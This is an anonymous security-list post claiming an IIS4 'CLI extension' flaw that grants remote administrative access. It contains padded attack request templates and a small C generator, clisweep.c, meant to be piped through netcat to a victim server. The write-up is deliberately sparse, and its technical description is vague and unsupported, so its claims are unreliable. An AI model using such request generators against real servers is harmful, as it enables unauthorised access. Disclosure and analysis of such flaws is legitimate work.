Shinex vs. IIS CLI Extensions

[dev-null () NO-ID COM (dev-null () NO-ID COM)]

[ This message has been sent anonymously due to configuration problems
I'm experiencing with my mail server. If you would like to discuss
the finepoints of this post, you're quite welcome to message me on
Efnet (nickname: shinex). ]

While doing a security audit on a WinNT 4.0 system, I discovered an 
`object collision` vulnerability that can potentially lead to remote 
compromise.

The flaw lies in the mechanism employed by CLI objects to handle
dynamic pre-auth requests from a stateful client. States of operation
are inherent in the implementation itself. This flaw could lead to a
determined attacker gaining administrative privileges on servers 
using this widely deployed object kit.  

EXPLOITATION NOTES
------------------

Request #1:
http://www.victim.com/.....~518 chars.../[invocation of CLI object]

Request #2:
http://www.victim.com/.....~260 chars.../[request with req1 object as ext]

Simple as that.

It's important that both requests reach the target server within
a timeframe of 15 seconds (a rough estimate). Your threshold may vary.
Subsequent requests will be made with raised authorization levels.
The rationale for the char padding will be available later in the
followup post (see below).

Microsoft has been notified and patching information should be forthcoming. 
While not as severe as the RDS vulnerability, it is still an avenue of attack 
that could provide a determined attacker with unauthorized access.

(Allow me to mention in passing that the scarcity of detail in this paper
is intentional. A more thorough assessment will be posted after Microsoft
have released their hotfix.)

HELPER CODE
-----------
/*
** clisweep.c by shinex (efnet)  
** Quick generator for IIS4 CLI extension vuln URLs. 
** 
** $ (./clisweep <cli object> ; cat) | nc www.victim.com 80 
** OK. This code is buggy, because I mistakingly thought
** that both requests would be delivered without having
** to restart netcat. I can't code network apps. Sorry.
**
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define DOT1 518
#define DOT2 260
#define THRESHOLD 15
#define RANDFILE "AABBCC"

char *gendots(int);
char *calc(char *);

int main(int argc, char *argv[])
{
    char req1[1024], req2[1024];

    if(argc != 2)
    {   
        fprintf(stderr, "Usage: %s <cli object>\n", *argv);
        return -1;
    }

    sprintf(req1, "GET /%s/%s", gendots(DOT1), argv[1]);
    sprintf(req2, "GET /%s/%s", gendots(DOT2), calc(argv[1])); 

#ifdef SCRIPTKIDPROTECTION
    printf("%s\n\n", req1);
    sleep(THRESHOLD);
    printf("%s\n\n", req2);
#endif
    return 0;

}

char *gendots(int num)
{
    int i;
    static char dots[1024];
    char *ptr = dots;     

    for(i = 0; i < num; i++)
        *ptr++ = '.';    

    return dots;
}

char *calc(char *arg)
{
    static char file[1024];    
    char *ptr;
    ptr = strrchr(arg, '.');     
    *ptr = '\0'; /* no error checks */
    sprintf(file, "%s.%s", RANDFILE, arg);
    return file;
}

SHOUTOUTS
---------
Greets to route and my other friends.


--
This message has been sent via an anonymous mail relay at www.no-id.com.